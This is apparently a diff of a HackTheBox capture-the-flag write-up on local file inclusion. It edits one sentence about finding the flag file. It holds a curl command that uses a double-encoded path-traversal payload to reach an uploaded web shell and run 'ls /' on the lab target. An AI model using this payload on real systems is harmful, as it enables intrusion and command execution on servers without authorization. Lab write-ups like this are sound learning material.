shohrukhodinaev37-cpu/htb-writeups/LFI.md

 ## Obtain the flag

-I moved to the `/` directory to this what's our flag file name
+I moved to the `root` directory to this what's our flag file name

 ```bash
 curl "http://83.136.251.67:41528/contact.php?region=%252e%252e%252fuploads%252fc214a2fb80bab315fc328a5eff2892b5&cmd=ls%20/"